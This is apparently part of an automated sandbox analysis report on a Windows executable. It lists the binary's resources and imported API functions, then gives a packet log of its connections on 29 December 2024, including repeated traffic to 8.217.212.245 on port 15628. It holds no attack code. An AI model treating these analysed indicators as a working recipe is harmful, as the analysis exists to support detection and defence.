| RT_STRING | 0x1f9edd4 | 0xd0 | StarOffice Gallery theme p, 1929408256 objects, 1st p | English | United States | 0.6394230769230769 |
| RT_STRING | 0x1f9eea4 | 0x2a | data | English | United States | 0.5476190476190477 |
| RT_STRING | 0x1f9eed0 | 0x184 | data | English | United States | 0.48711340206185566 |
| RT_STRING | 0x1f9f054 | 0x124 | data | English | United States | 0.4897260273972603 |
| RT_STRING | 0x1f9f178 | 0x4e6 | data | English | United States | 0.37719298245614036 |
| RT_STRING | 0x1f9f660 | 0x264 | data | English | United States | 0.3333333333333333 |
| RT_STRING | 0x1f9f8c4 | 0x2da | data | English | United States | 0.3698630136986301 |
| RT_STRING | 0x1f9fba0 | 0x8a | data | English | United States | 0.6594202898550725 |
| RT_STRING | 0x1f9fc2c | 0xac | data | English | United States | 0.45348837209302323 |
| RT_STRING | 0x1f9fcd8 | 0xde | data | English | United States | 0.536036036036036 |
| RT_STRING | 0x1f9fdb8 | 0x4a8 | data | English | United States | 0.3221476510067114 |
| RT_STRING | 0x1fa0260 | 0x228 | data | English | United States | 0.4003623188405797 |
| RT_STRING | 0x1fa0488 | 0x2c | data | English | United States | 0.5227272727272727 |
| RT_STRING | 0x1fa04b4 | 0x42 | data | English | United States | 0.6060606060606061 |
| RT_ACCELERATOR | 0x1fa04f8 | 0x88 | data | English | United States | 0.6911764705882353 |
| RT_ACCELERATOR | 0x1fa0580 | 0x230 | data | English | United States | 0.5285714285714286 |
| RT_ACCELERATOR | 0x1fa07b0 | 0x18 | data | English | United States | 1.2083333333333333 |
| RT_GROUP_CURSOR | 0x1fa07c8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa07dc | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822 |
| RT_GROUP_CURSOR | 0x1fa0800 | 0x22 | Lotus unknown worksheet or configuration, revision 0x2 | English | United States | 1.0294117647058822 |
| RT_GROUP_CURSOR | 0x1fa0824 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0838 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa084c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0860 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0874 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0888 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa089c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa08b0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa08c4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa08d8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa08ec | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0900 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0914 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0x1fa0928 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0x1fa093c | 0x14 | data | English | United States | 1.15 |
| RT_GROUP_ICON | 0x1fa0950 | 0x22 | data | English | United States | 1.0294117647058822 |
                                                                                                                                                                                                  RT_VERSION0x1fa09740xdcdataEnglishUnited States0.6590909090909091
                                                                                                                                                                                                  RT_MANIFEST0x1fa0a500x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                                                                                                                                                                                                  None0x1fa0bb80x64SysEx File - OctavePlateauEnglishUnited States0.79
                                                                                                                                                                                                  None0x1fa0c1c0x71dataEnglishUnited States0.45132743362831856
                                                                                                                                                                                                  None0x1fa0c900x40dataEnglishUnited States1.0625
                                                                                                                                                                                                  None0x1fa0cd00x2adataEnglishUnited States1.0952380952380953
                                                                                                                                                                                                  None0x1fa0cfc0x34dataEnglishUnited States1.0576923076923077
DLL | Import
KERNEL32.dll | IsDebuggerPresent, RtlVirtualUnwind, RtlCaptureContext, GetACP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, GetStdHandle, HeapSetInformation, HeapCreate, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetUnhandledExceptionFilter, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, UnhandledExceptionFilter, TerminateProcess, HeapSize, HeapQueryInformation, ExitProcess, Sleep, RtlPcToFileHeader, RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, GetStartupInfoA, GetCommandLineA, HeapReAlloc, HeapAlloc, HeapFree, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, SetErrorMode, GetCurrentDirectoryA, FileTimeToLocalFileTime, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, GlobalHandle, GlobalReAlloc, TlsAlloc, InitializeCriticalSection, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GetModuleHandleW, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFlags, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetShortPathNameA, GetFullPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, lstrcmpiA, GetThreadLocale, GetStringTypeExA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetCurrentProcessId, lstrcmpA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetModuleFileNameW, GetProfileIntA, GetTickCount, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, CompareStringA, FreeLibrary, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MultiByteToWideChar, GlobalFree, FreeResource, GetModuleFileNameA, lstrcpynA, GlobalAlloc, MulDiv, GetProcAddress, GetModuleHandleA, LoadLibraryA, GetLastError, SetLastError, FindClose, MoveFileA, DeleteFileA, FindFirstFileA, WriteFile, GetTempFileNameA, lstrcatA, lstrcpyA, CloseHandle, ReadFile, CreateFileA, GetFileAttributesA, lstrlenA, GlobalUnlock, GlobalLock, FindResourceA, LoadResource, LockResource, SizeofResource, GetEnvironmentStringsW, WideCharToMultiByte
USER32.dll | CopyAcceleratorTableA, CreateMenu, PostThreadMessageA, GetTabbedTextExtentA, GetDCEx, LockWindowUpdate, DestroyIcon, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, GetClassLongPtrA, SetPropA, GetPropA, RemovePropA, GetFocus, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetWindowLongPtrA, SetWindowLongPtrA, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, PostMessageA, MessageBoxA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, SetParent, SetScrollInfo, CopyRect, GetDlgCtrlID, PtInRect, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SetWindowPos, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, GetMenuItemID, GetMenuItemCount, GetSubMenu, RemoveMenu, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowLongA, IsWindowEnabled, GetParent, GetNextDlgTabItem, EndDialog, ShowWindow, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, IsClipboardFormatAvailable, SetTimer, SetCapture, GetKeyState, TranslateAcceleratorA, LoadAcceleratorsA, KillTimer, ReleaseCapture, LoadCursorA, SetCursor, ScreenToClient, SendMessageA, EnableWindow, GetAsyncKeyState, GetSystemMenu, DeleteMenu, GetCursorPos, EnableScrollBar, GetDlgItem, ReleaseDC, GetDC, InvalidateRect, IsWindow, OffsetRect, GetSysColor, HideCaret, ShowCaret, SetCaretPos, CreateCaret, UpdateWindow, GetClientRect, SetWindowRgn, DrawIcon, UnregisterClassA, GetMenuItemInfoA, GetSysColorBrush, ShowOwnedPopups, CharUpperA, GetMessageA, TranslateMessage, ValidateRect, RegisterClipboardFormatA, GetScrollInfo, PostQuitMessage, WindowFromPoint, IsZoomed, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, IsRectEmpty, SetCursorPos, RedrawWindow, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, DestroyCursor, SetRect, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, InflateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, DeferWindowPos, CheckMenuItem, UnpackDDElParam
GDI32.dll | DeleteDC, CreatePen, GetViewportOrgEx, Rectangle, PatBlt, GetStockObject, ExtTextOutA, CreateRectRgn, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, DeleteObject, CreatePatternBrush, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, ExcludeClipRect, IntersectClipRect, LineTo, MoveToEx, SetTextAlign, SelectClipRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, TextOutA, Escape, EndDoc, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreateSolidBrush, GetTextMetricsA, GetCharWidthA, CreateFontA, StretchDIBits, GetBkColor, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetAbortProc, AbortDoc, EndPage, StartPage, StartDocA, DPtoLP, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetObjectA, SelectObject, CreateCompatibleDC, CreateFontIndirectA, BitBlt, CreateCompatibleBitmap, GetTextExtentPoint32A
COMDLG32.dll | GetFileTitleA
WINSPOOL.DRV | DocumentPropertiesA, OpenPrinterA, GetJobA, ClosePrinter
ADVAPI32.dll | GetFileSecurityA, SetFileSecurityA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegCreateKeyExA, RegSetValueA, RegCloseKey, RegQueryValueA, RegOpenKeyExA, RegCreateKeyA
SHELL32.dll | ExtractIconA, DragAcceptFiles, ShellExecuteA, DragFinish, DragQueryFileA, SHGetFileInfoA, SHGetSpecialFolderPathA
SHLWAPI.dll | PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
oledlg.dll |
ole32.dll | OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CreateStreamOnHGlobal, CoCreateInstance, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoRegisterMessageFilter, CoRevokeClassObject, IsAccelerator
OLEAUT32.dll | VariantClear, VariantChangeType, VariantInit, SysAllocStringLen
OLEACC.dll | LresultFromObject, CreateStdAccessibleObject
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.936084986 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:27.936239958 CET4985715628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.057060957 CET15628498578.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.943716049 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:28.998764992 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.055139065 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.064481020 CET53498668.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.064563990 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.068079948 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088778019 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088831902 CET44349867172.217.21.36192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.088896990 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089180946 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089214087 CET44349869103.235.46.96192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.089385033 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096400023 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096441984 CET44349867172.217.21.36192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.096664906 CET49867443192.168.2.6172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098151922 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098201990 CET44349869103.235.46.96192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.098292112 CET49869443192.168.2.6103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.189012051 CET53498668.8.8.8192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.189080954 CET4986653192.168.2.68.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.284972906 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.284996986 CET4434987177.88.55.88192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.285193920 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300220966 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300283909 CET4434987177.88.55.88192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.300460100 CET49871443192.168.2.677.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664639950 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664664984 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.664748907 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.673405886 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.673428059 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.700167894 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.751595974 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:29.872473001 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225080013 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225123882 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225183010 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225223064 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225248098 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225270987 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225440979 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225459099 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.225527048 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.258658886 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.258675098 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.273610115 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.273631096 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.274367094 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.274394989 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.333457947 CET804986218.136.85.30192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:30.335833073 CET4986280192.168.2.618.136.85.30
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.942890882 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.942966938 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.943612099 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.943727016 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948213100 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948218107 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948472977 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.948812008 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949167967 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949198961 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.949259043 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.961760998 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:31.961774111 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.133656979 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.133723974 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136460066 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136470079 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136605024 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.136722088 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.179387093 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.287182093 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.287296057 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301537037 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301552057 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301671028 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301774979 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.301785946 CET4434987813.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.302772045 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.302874088 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306111097 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306119919 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306194067 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.306282043 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.319077969 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.319096088 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.345839024 CET49878443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.351330996 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440414906 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440431118 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.440469027 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.584064960 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.647674084 CET49877443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.705033064 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.705158949 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.707348108 CET4988615628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:32.828231096 CET15628498868.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152110100 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152456999 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.152741909 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.153026104 CET49879443192.168.2.613.227.9.24
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.153050900 CET4434987913.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.317579031 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:33.317671061 CET4434987713.227.9.24192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:51.621808052 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.394167900 CET443499398.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.394248962 CET49939443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.398030043 CET49939443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.398053885 CET443499398.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.398231030 CET443499398.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.398283958 CET49939443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.400501013 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.400543928 CET443499458.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.400696993 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.404591084 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.404603004 CET443499458.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406595945 CET49933443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406614065 CET4434993323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406815052 CET49892443192.168.2.6183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406825066 CET49939443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406832933 CET44349892183.60.146.66192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406861067 CET443499398.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.406987906 CET49926443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407000065 CET4434992623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407099962 CET49919443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407109976 CET49913443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407119036 CET4434991923.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407119989 CET4434991323.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407146931 CET49900443192.168.2.68.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407186985 CET443499008.223.56.120192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407262087 CET49906443192.168.2.635.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407285929 CET4434990635.227.223.56192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407289028 CET49885443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407310009 CET443498858.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407500029 CET49876443192.168.2.623.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:15:52.407505989 CET4434987623.98.101.155192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.602530003 CET443499458.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.602663994 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.610147953 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.610167027 CET443499458.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.610349894 CET443499458.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.610438108 CET49945443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.611350060 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.611390114 CET443499518.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.611444950 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.617048025 CET49951443192.168.2.68.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.617059946 CET443499518.223.59.119192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.793458939 CET4995215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.914927959 CET15628499528.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.915019035 CET4995215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:54.916284084 CET4995215628192.168.2.68.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:15:55.037240028 CET15628499528.217.212.245192.168.2.6
                                                                                                                                                                                                  Dec 29, 2024 16:15:57.373058081 CET443499518.223.59.119192.168.2.6
